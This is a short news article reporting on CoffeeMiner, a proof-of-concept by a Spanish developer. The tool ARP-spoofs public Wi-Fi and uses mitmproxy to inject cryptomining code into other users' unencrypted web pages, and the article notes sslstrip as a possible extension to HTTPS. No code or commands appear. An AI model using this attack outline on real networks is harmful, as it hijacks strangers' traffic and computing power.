Thanks to the ridiculous valuation of Bitcoin and other cryptocurrencies, cryptomining code has become a common mechanism for converting authorized and stolen computing cycles into potential cash.
For those interested in violating computer laws – please, don’t – and those interested in computer security research projects, a developer named Arnau, based in Spain, has published a proof-of-concept walkthrough for hacking public Wi-Fi networks to inject crypto-mining code in connected browsing sessions.
CoffeeMiner is a project that allows the sort of man-in-the-middle attack that has been used by cyber thieves in Starbucks cafes and doubtless elsewhere.
The CoffeeMiner script is designed to spoof Address Resolution Protocol (ARP) messages on a local area network in order to intercept unencrypted traffic from other devices on the network.
It turn conducts a man-in-the-middle attack using software called mitmproxy to inject the following line of HTML code into non-HTTPS, or otherwise non-encrypted, webpages requested by others on the networks:
As Arnau explained, the attack – demonstrated on a VirtualBox set up rather than in the wild – can be automated. The published version doesn’t work with requests for HTTPS webpages, though the addition of sslstrip could solve that.
The code, mostly Python, is available on GitHub. ®